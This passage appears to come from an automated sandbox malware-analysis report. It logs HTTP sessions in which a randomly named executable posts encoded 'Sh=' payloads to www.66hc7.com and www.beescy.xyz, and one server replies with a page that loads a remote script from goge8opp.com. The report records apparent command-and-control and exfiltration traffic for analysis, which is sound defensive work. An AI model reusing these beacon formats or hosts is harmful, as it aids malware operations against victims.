                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.66hc7.com/x35b/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 53 58 72 71 4b 45 79 33 65 4f 30 51 57 2f 56 6a 6c 30 49 50 78 6f 70 6f 65 78 70 6c 54 4a 34 35 56 33 64 61 63 64 39 31 4c 6c 6f 2b 62 68 36 45 45 34 64 72 6d 5a 75 35 66 79 4c 76 34 67 35 71 43 6c 4e 37 69 58 6a 74 54 5a 79 48 71 55 62 67 4d 4b 64 49 63 45 53 72 64 52 43 72 71 67 37 44 6d 72 76 62 6b 6d 55 62 6f 79 4c 30 49 4d 6b 6e 32 44 31 49 49 57 74 71 36 56 4c 52 4b 31 5a 43 37 50 55 63 55 2b 5a 47 34 33 33 4c 67 4a 75 72 59 79 4d 75 30 77 57 32 48 66 6b 4c 51 33 49 50 34 6c 66 51 48 6a 78 44 66 45 57 4a 58 61 33 73 34 55 49 2f 59 4f 2f 4b 74 74 63 35 33 66 2f 64 78 67 3d 3d
                                                                                                        Data Ascii: Sh=SXrqKEy3eO0QW/Vjl0IPxopoexplTJ45V3dacd91Llo+bh6EE4drmZu5fyLv4g5qClN7iXjtTZyHqUbgMKdIcESrdRCrqg7DmrvbkmUboyL0IMkn2D1IIWtq6VLRK1ZC7PUcU+ZG433LgJurYyMu0wW2HfkLQ3IP4lfQHjxDfEWJXa3s4UI/YO/Kttc53f/dxg==
                                                                                                        Oct 10, 2024 14:47:03.958451986 CEST192INHTTP/1.1 200 OK
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 96
                                                                                                        Cache-Control: max-age=2592000
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        14192.168.2.450006162.209.189.212805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:47:06.017105103 CEST759OUTPOST /x35b/ HTTP/1.1
                                                                                                        Host: www.66hc7.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.66hc7.com
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 219
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.66hc7.com/x35b/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 53 58 72 71 4b 45 79 33 65 4f 30 51 58 63 39 6a 6d 56 49 50 67 49 70 72 52 52 70 6c 5a 70 34 39 56 33 52 61 63 66 51 75 4b 57 63 2b 62 46 2b 45 46 35 64 72 6c 5a 75 35 48 69 4c 75 32 41 35 62 43 6c 51 47 69 57 50 74 54 64 69 48 71 57 54 67 4e 39 4a 4c 61 55 53 70 45 42 43 31 6c 41 37 44 6d 72 76 62 6b 6d 42 54 6f 78 37 30 49 2f 4d 6e 32 6e 68 50 46 32 74 72 35 56 4c 52 4f 31 5a 47 37 50 55 69 55 37 42 67 34 31 2f 4c 67 49 65 72 66 6a 4d 74 39 77 57 77 44 66 6b 55 42 69 31 36 30 77 7a 51 43 77 56 79 63 6d 4f 2b 53 63 6d 32 70 6c 70 6f 4b 4f 62 35 77 71 56 4e 36 63 43 55 71 6c 7a 4a 4c 79 6b 65 47 53 75 71 4f 79 61 67 4b 33 6b 62 58 43 30 3d
                                                                                                        Data Ascii: Sh=SXrqKEy3eO0QXc9jmVIPgIprRRplZp49V3RacfQuKWc+bF+EF5drlZu5HiLu2A5bClQGiWPtTdiHqWTgN9JLaUSpEBC1lA7DmrvbkmBTox70I/Mn2nhPF2tr5VLRO1ZG7PUiU7Bg41/LgIerfjMt9wWwDfkUBi160wzQCwVycmO+Scm2plpoKOb5wqVN6cCUqlzJLykeGSuqOyagK3kbXC0=
                                                                                                        Oct 10, 2024 14:47:06.543301105 CEST192INHTTP/1.1 200 OK
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 96
                                                                                                        Cache-Control: max-age=2592000
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        15192.168.2.450019162.209.189.212805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:47:08.566616058 CEST10841OUTPOST /x35b/ HTTP/1.1
                                                                                                        Host: www.66hc7.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.66hc7.com
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 10299
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.66hc7.com/x35b/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 53 58 72 71 4b 45 79 33 65 4f 30 51 58 63 39 6a 6d 56 49 50 67 49 70 72 52 52 70 6c 5a 70 34 39 56 33 52 61 63 66 51 75 4b 57 45 2b 62 57 32 45 45 61 31 72 6b 5a 75 35 5a 79 4c 72 32 41 35 47 43 6c 59 43 69 57 53 59 54 62 2b 48 72 31 4c 67 4b 4d 4a 4c 55 55 53 70 4c 68 43 6f 71 67 36 48 6d 76 4c 66 6b 6d 52 54 6f 78 37 30 49 36 49 6e 2f 54 31 50 57 6d 74 71 36 56 4c 64 4b 31 5a 69 37 50 4e 61 55 37 31 57 34 42 7a 4c 6a 6f 4f 72 65 56 59 74 79 77 57 79 4f 2f 6c 42 42 69 78 54 30 30 53 72 43 78 78 55 63 6b 53 2b 54 71 6e 65 75 46 39 71 55 65 79 2f 77 37 70 76 78 75 53 6b 68 6c 62 6c 48 41 4a 42 65 69 6d 64 4a 51 33 61 57 6c 49 6b 4e 46 72 32 58 4d 51 34 58 57 68 51 6c 75 45 68 41 44 4f 51 34 4f 52 46 69 4f 64 77 4c 39 30 70 71 7a 78 46 56 32 34 44 75 39 4c 72 41 6d 57 64 61 51 6b 55 63 46 2b 34 39 65 46 56 54 49 6d 50 58 64 46 2f 39 77 34 50 37 78 73 70 33 61 79 37 6b 76 34 4d 65 61 64 63 62 63 64 42 30 49 50 79 38 73 63 59 63 34 48 6f 37 58 4d 6e 79 56 6e 58 7a 69 51 52 6e 72 30 62 67 4b 56 [TRUNCATED]
                                                                                                        Data Ascii: Sh=SXrqKEy3eO0QXc9jmVIPgIprRRplZp49V3RacfQuKWE+bW2EEa1rkZu5ZyLr2A5GClYCiWSYTb+Hr1LgKMJLUUSpLhCoqg6HmvLfkmRTox70I6In/T1PWmtq6VLdK1Zi7PNaU71W4BzLjoOreVYtywWyO/lBBixT00SrCxxUckS+TqneuF9qUey/w7pvxuSkhlblHAJBeimdJQ3aWlIkNFr2XMQ4XWhQluEhADOQ4ORFiOdwL90pqzxFV24Du9LrAmWdaQkUcF+49eFVTImPXdF/9w4P7xsp3ay7kv4MeadcbcdB0IPy8scYc4Ho7XMnyVnXziQRnr0bgKV10PxXXzfk9TPE47oIrGjO++wy5KNbscTIc4KcU7yc4MncJLEQM4LpGQdGj5UAaPHPVCvQH+7Cn5KTfsRhDtk7iDD8sRaR1qa5Eh0Tddq7mMxiwFhHBVb4WXixNFPsqAYvwXGnjOoLz6Yo136S7662Jgo8VuP853xYbWVYqCPGjOdN+uYDvgbl9AblGhUt80gvh5pzYAN7iLcIXDwpCefAVsr6miwbqmiAktgJ6ZXOWruBjTAf63eau5+AIvyYUIL35o12K3don6SbEcdumIVf7m+Nii8YbI6OnWcZYj2OGfs9SzyPimc4LG4eFrmVjfCdWgLVweOBPA7C50RaTmNmO4DfSv22XnddQNtHjXL4iZNTX5Vss6M5vx8DcpwygZS0BuWh+DYIl8uWw4kBuQEyLrzMdlA3ZGoRtAifNthc/n1nGTyZMRd/KR2lQ3i2cd6OMUpGUj6WL7uTbX9vi/xab7YGVmWfB8p4MXKJ1nABJ3HG/AeYPTtGvwnAw1BHJtberk5bIP44t5r+0POaLlNPkgb19K/OC5xDpRyqdS78EOD4IehNZ3otjGZmWq9X99BHtEd80oyFC6EQ7EwyPmKpFs/ec++VrMYtyCAXM0DjbznezOBBgqCWFOcrZ4KGqrc7OwS66qTq8YrflvcArpao1L9WsOdr+dQl3 [TRUNCATED]
                                                                                                        Oct 10, 2024 14:47:09.117835045 CEST192INHTTP/1.1 200 OK
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 96
                                                                                                        Cache-Control: max-age=2592000
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        16192.168.2.450020162.209.189.212805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:47:11.120007038 CEST482OUTGET /x35b/?Sh=fVDKJz+SStMVbfQUmkYKwfd/Kz5vW54YQ3dZU+tucUYAFBvCN7d4q6mFay3q8TR2KAYtpV66b4jE73PrL/8YW0e6Mz+digafyc3ZonBVmSzoReAw1BtBLHs=&f6SpQ=_n84nZ4HGta HTTP/1.1
                                                                                                        Host: www.66hc7.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Oct 10, 2024 14:47:11.618407011 CEST192INHTTP/1.1 200 OK
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 96
                                                                                                        Cache-Control: max-age=2592000
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        17192.168.2.450021162.0.213.72805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:47:16.683563948 CEST742OUTPOST /m4qv/ HTTP/1.1
                                                                                                        Host: www.beescy.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.beescy.xyz
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 199
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.beescy.xyz/m4qv/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 43 30 37 4f 76 32 64 71 56 56 51 34 48 35 79 6b 43 54 77 6f 72 4b 56 63 38 75 6f 35 4b 30 5a 33 44 55 38 64 45 36 4d 6e 6e 64 30 67 75 58 6b 55 32 6b 52 57 39 41 65 67 67 66 34 64 6c 5a 6e 67 79 4b 4b 53 44 38 6c 47 66 45 33 41 49 4c 41 39 6f 34 5a 4f 4d 36 6b 53 4c 4a 51 74 38 4b 61 58 52 70 6c 31 74 6a 6a 5a 78 35 49 75 75 68 30 6f 2b 73 59 61 4b 36 76 37 62 61 70 63 5a 67 5a 4d 58 37 39 73 74 47 63 4d 47 61 54 4b 44 73 5a 79 4d 2f 73 6b 44 64 51 6e 6f 77 51 65 63 53 48 57 75 41 38 4b 52 54 68 6c 54 68 74 70 4c 31 6a 54 7a 33 55 32 35 6f 75 4a 4e 45 72 4c 7a 2b 66 63 77 51 3d 3d
                                                                                                        Data Ascii: Sh=C07Ov2dqVVQ4H5ykCTworKVc8uo5K0Z3DU8dE6Mnnd0guXkU2kRW9Aeggf4dlZngyKKSD8lGfE3AILA9o4ZOM6kSLJQt8KaXRpl1tjjZx5Iuuh0o+sYaK6v7bapcZgZMX79stGcMGaTKDsZyM/skDdQnowQecSHWuA8KRThlThtpL1jTz3U25ouJNErLz+fcwQ==
                                                                                                        Oct 10, 2024 14:47:17.274939060 CEST1236INHTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:47:17 GMT
                                                                                                        Server: Apache
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Content-Length: 16026
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                        Oct 10, 2024 14:47:17.274990082 CEST1236INData Raw: 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38
                                                                                                        Data Ascii: .196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,
                                                                                                        Oct 10, 2024 14:47:17.275023937 CEST1236INData Raw: 35 2d 31 32 2e 34 30 38 0a 09 09 09 63 30 2d 33 2e 33 37 38 2d 31 35 2e 33 34 37 2d 34 2e 39 38 38 2d 34 30 2e 32 34 33 2d 37 2e 32 32 35 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68
                                                                                                        Data Ascii: 5-12.408c0-3.378-15.347-4.988-40.243-7.225" /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.5
                                                                                                        Oct 10, 2024 14:47:17.275058985 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22
                                                                                                        Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none"
                                                                                                        Oct 10, 2024 14:47:17.275100946 CEST896INData Raw: 20 20 20 20 78 31 3d 22 34 32 36 2e 38 37 31 22 20 79 31 3d 22 33 38 36 2e 31 37 35 22 20 78 32 3d 22 34 33 37 2e 34 37 34 22 20 79 32 3d 22 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20
                                                                                                        Data Ascii: x1="426.871" y1="386.175" x2="437.474" y2="386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="48
                                                                                                        Oct 10, 2024 14:47:17.275553942 CEST1236INData Raw: 32 39 35 2e 31 38 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c
                                                                                                        Data Ascii: 295.189" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /
                                                                                                        Oct 10, 2024 14:47:17.275609016 CEST224INData Raw: 34 2e 32 31 35 22 20 79 31 3d 22 34 31 31 2e 31 34 36 22 20 78 32 3d 22 34 37 36 2e 33 37 38 22 20 79 32 3d 22 34 31 31 2e 31 34 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: 4.215" y1="411.146" x2="476.378" y2="411.146" /> </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-
                                                                                                        Oct 10, 2024 14:47:17.275659084 CEST1236INData Raw: 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 35 38 38 2e 39 37 37 22 20 63 79 3d 22 32 35 35 2e 39 37 38 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: miterlimit="10" cx="588.977" cy="255.978" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="450.066" cy="320.259" r="7.952"
                                                                                                        Oct 10, 2024 14:47:17.275710106 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 34 31 33 2e 36 31 38 22 20 63 79 3d 22 34 38 32 2e 33 38 37 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: cx="413.618" cy="482.387" r="7.952" /> </g> <g id="circlesSmall"> <circle fill="#0E0620" cx="549.879" cy="296.402" r="2.651" /> <circle fill="#0E0620" cx="253.29" cy="2
                                                                                                        Oct 10, 2024 14:47:17.275747061 CEST1236INData Raw: 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 20 64 3d 22
                                                                                                        Data Ascii: linecap="round" stroke-linejoin="round" stroke-miterlimit="10" d="M338.164,454.689l-64.726-17.353c-11.086-2.972-17.664-14.369-14.692-25.455l15.694-58.537c3.889-14.504,18.799-23.11,33.303-19.221l52.349,14.035c14.504,3.88
                                                                                                        Oct 10, 2024 14:47:17.279949903 CEST1236INData Raw: 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72
                                                                                                        Data Ascii: ="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" d="M388.762,434.677c5.234-3.039,7.731-8.966,6.678-14.594c2.344,1.343,4.383,3.289,5.837,5.793c4.411,7.596,1.829,17.33-5.767,21.741c-7.596,4.4


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        18192.168.2.450022162.0.213.72805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:47:19.223261118 CEST762OUTPOST /m4qv/ HTTP/1.1
                                                                                                        Host: www.beescy.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.beescy.xyz
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 219
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.beescy.xyz/m4qv/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 43 30 37 4f 76 32 64 71 56 56 51 34 47 5a 69 6b 4f 51 59 6f 36 36 56 62 6c 65 6f 35 54 6b 5a 7a 44 55 67 64 45 37 35 38 6e 4c 63 67 76 32 55 55 33 6c 52 57 30 51 65 67 34 50 35 58 6f 35 6e 37 79 4b 58 6e 44 35 64 47 66 45 6a 41 49 4f 6b 39 6f 70 5a 52 4e 71 6b 4d 42 5a 51 72 68 61 61 58 52 70 6c 31 74 6a 48 7a 78 35 41 75 76 51 45 6f 35 35 34 64 55 4b 76 36 63 61 70 63 4b 77 5a 49 58 37 38 35 74 46 59 32 47 59 62 4b 44 74 70 79 50 74 45 6e 61 4e 51 68 31 41 52 4e 4b 54 79 39 69 6a 34 62 57 69 52 44 54 6a 5a 6b 48 54 79 4a 69 47 31 68 72 6f 4b 36 51 44 69 2f 2b 39 69 56 72 61 4f 52 4f 76 66 55 35 56 4d 74 6c 4c 72 62 63 2f 68 61 69 33 30 3d
                                                                                                        Data Ascii: Sh=C07Ov2dqVVQ4GZikOQYo66Vbleo5TkZzDUgdE758nLcgv2UU3lRW0Qeg4P5Xo5n7yKXnD5dGfEjAIOk9opZRNqkMBZQrhaaXRpl1tjHzx5AuvQEo554dUKv6capcKwZIX785tFY2GYbKDtpyPtEnaNQh1ARNKTy9ij4bWiRDTjZkHTyJiG1hroK6QDi/+9iVraOROvfU5VMtlLrbc/hai30=
                                                                                                        Oct 10, 2024 14:47:19.839344978 CEST1236INHTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:47:19 GMT
                                                                                                        Server: Apache
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Content-Length: 16026
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
